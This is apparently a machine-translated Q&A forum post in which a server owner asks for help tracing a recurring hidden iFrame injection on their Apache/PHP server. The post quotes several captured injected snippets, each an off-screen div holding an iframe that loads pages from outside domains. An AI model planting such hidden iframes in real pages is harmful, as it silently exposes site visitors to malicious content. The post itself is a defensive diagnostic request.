iFrame Injection Attack последовал за нами на новый сервер

Несколько месяцев назад скрытый iFrame начал появляться на каждой странице каждого сайта на нашем выделенном сервере. Когда мы отключили сайты для обслуживания с 503, iFrame все еще находился на странице внизу для обслуживания. В конце концов, хост заблокировал источник iFrame, но мы так и не нашли черный ход. Внедренный iFrame выглядел примерно так, но обернут в тег стиля для запутывания и с различными URL-адресами:

iframe src = & quot; http: //heusnsy.nl/32283947.html ..

Мы переместили наши небольшие сайты на другой хост, и они были в порядке.

Мы переместили наш основной сайт на новый выделенный сервер на том же хосте и, несмотря на наши усилия по блокировке сервера - брандмауэры, ограниченный доступ, обновления программного обеспечения, проверка каждого файла - вернул iFrame.

Мы везде искали, как это происходит - файлы конфигурации, htaccess, - но не можем его найти.

Любая идея, где могут быть скрытые уязвимости инъекции iFrame?

Редактировать : Вот более подробная информация: Linux-машина под управлением Apache и PHP. Последние версии всего. Код, который был внедрен, выглядит так:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

Обновить : Вот больше информации и что мы узнали:

хост: Station CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 на платформе x86_64 / Apache версии 2.2.15 - PHP 5.3.3 (cli) (сборка: 3 июля 2012 г., 16:53:21)

Server itself is not compromised.

All the services including (apache/php) are upgraded to the latest versions available for our system.

No accounts (ftp or otherwise) were compromised.

Malware changes it's destination URL (iframe src=) simultaneously on several infected sites. (Courtesy of unmaskparasites.com)

During the change of the src target, no rogue or hidden processes were executed/running.

TCPDUMP got the code of the malware while leaving out of port 80 tcp but nothing strange was found in the GET request from the user receiving the malware - nothing strange was found in the corresponding apache access logs too.

Website files or the httpd/php binary's were not changed in any way during the switch of src url address of the iFrame - courtesy of md5sum check.

No rogue connections were made on the known ports for the known services during the change. Firewall takes care for the rest.

rkhunter and maldet came up with no results.

Malware iFrame gets triggered and injected right after the first "</script>" tag on any page having this tag, on all accounts and websites on this server.

Malware gets injected into static pages and on sites without database connections. (it is enough for the page to have <head> </script></head> tags)

No rogue apache modules or php modules (excluding mycript.so) were installed. Most of the default apache modules are suspended and commented out.

Malware is not constantly present. It comes and goes, sometimes it's off for several hours, and then shows up for several users and goes out again. Making it extremely hard to trace.

100% of the php codes and most of the javascript codes runing on our sites (except the phpmyadmin one) are custom coded. The only thing that is not are the Jquery libs.

Сервер - машина с высоким трафиком, а поиск / сопоставление в журналах очень медленный Еженедельный журнал доступа может стать более 15 ГБ.

Это ситуация ... Это больше не вопрос взломанных учетных записей, взломанных файлов, мошеннических сценариев. Это нечто большее, чем мы видели до сих пор, и причина скрыта где-то в самом apache / php. (По крайней мере, это то, что мы думаем). Любая помощь или идеи очень ценятся.

Вот примеры внедрения iFrame:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

Ответы на вопрос(3)

Ваш ответ на вопрос